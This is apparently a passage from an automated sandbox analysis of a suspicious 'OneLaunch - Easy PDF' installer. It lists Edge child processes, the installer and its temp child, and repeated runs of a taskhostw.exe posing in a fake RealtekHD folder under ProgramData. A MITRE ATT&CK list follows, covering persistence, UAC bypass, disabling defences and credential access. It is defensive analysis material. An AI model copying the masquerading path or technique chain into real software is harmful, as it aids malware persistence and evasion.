  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
  2⤵
  PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1280 /prefetch:8
  2⤵
  PID:5888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:8
  2⤵
  PID:5856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
  2⤵
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
  2⤵
  PID:3436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
  2⤵
  PID:6000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
  2⤵
  PID:7132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=7392 /prefetch:8
  2⤵
  - Modifies registry class
  PID:4800
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7548 /prefetch:8
  2⤵
  PID:6440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
  2⤵
  PID:2504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:1
  2⤵
  PID:5796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7320 /prefetch:1
  2⤵
  PID:648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5732 /prefetch:2
  2⤵
  PID:7292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:6884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:7364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
  2⤵
  PID:7280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:1
  2⤵
  PID:4884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
  2⤵
  PID:4788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7748 /prefetch:1
  2⤵
  PID:7584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7280 /prefetch:1
  2⤵
  PID:7148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:1
  2⤵
  PID:7320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7900 /prefetch:1
  2⤵
  PID:7628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7948 /prefetch:1
  2⤵
  PID:7124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1
  2⤵
  PID:3312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8216 /prefetch:1
  2⤵
  PID:6176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8196 /prefetch:1
  2⤵
  PID:6572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8992 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8908 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9460 /prefetch:1
  2⤵
  PID:2312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8116 /prefetch:1
  2⤵
  PID:4596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9140 /prefetch:8
  2⤵
  PID:6076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8392 /prefetch:8
  2⤵
  - NTFS ADS
  PID:2976
- C:\Users\Admin\Downloads\OneLaunch - Easy PDF_n1yaa.exe
  "C:\Users\Admin\Downloads\OneLaunch - Easy PDF_n1yaa.exe"
  2⤵
  PID:6104
- - C:\Users\Admin\AppData\Local\Temp\is-CELSS.tmp\OneLaunch - Easy PDF_n1yaa.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-CELSS.tmp\OneLaunch - Easy PDF_n1yaa.tmp" /SL5="$60076,2484182,893952,C:\Users\Admin\Downloads\OneLaunch - Easy PDF_n1yaa.exe"
    3⤵
    PID:7624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:4684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
  2⤵
  PID:4700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7848 /prefetch:1
  2⤵
  PID:7536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
  2⤵
  PID:7628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8816 /prefetch:1
  2⤵
  PID:7944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1
  2⤵
  PID:4984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7848 /prefetch:1
  2⤵
  PID:7352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7152 /prefetch:1
  2⤵
  PID:7036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
  2⤵
  PID:7300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2356 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
  2⤵
  PID:5460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6412 /prefetch:1
  2⤵
  PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
  2⤵
  PID:3888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9688 /prefetch:1
  2⤵
  PID:7740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7856 /prefetch:1
  2⤵
  PID:6176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8252 /prefetch:1
  2⤵
  PID:7572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:1
  2⤵
  PID:5768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1
  2⤵
  PID:7396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8272 /prefetch:1
  2⤵
  PID:6956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
  2⤵
  PID:7296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:8
  2⤵
  - NTFS ADS
  PID:7728

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:5668

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5160

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6252

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5828

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:228

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:976

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:2364

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:7012

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:2136

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:6000

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:4492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5124

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8168

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:8172

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

Lateral Movement
